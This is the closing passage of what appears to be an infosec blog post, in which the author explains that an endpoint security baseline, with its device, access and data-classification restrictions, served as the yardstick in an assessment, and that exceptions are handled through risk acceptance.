Pls note: evidently, “everything else” (other combinations of devices, access methods or data classification levels to-be-processed) can be implemented as well (and this actually happens in environments I regularly work in). I mean, “infosec follows, supports and enables business”. It’s just – from our perspective – a risk acceptance needed then 😉
So, this is what I finally took as the “baseline to evaluate the actual implementation against” (for the “endpoint” category) in the course of that assessment mentioned in the beginning of the post. Hopefully laying out the sources of input, the classifications and the rationale leading to certain restrictions turns out to be helpful for some of you, dear readers.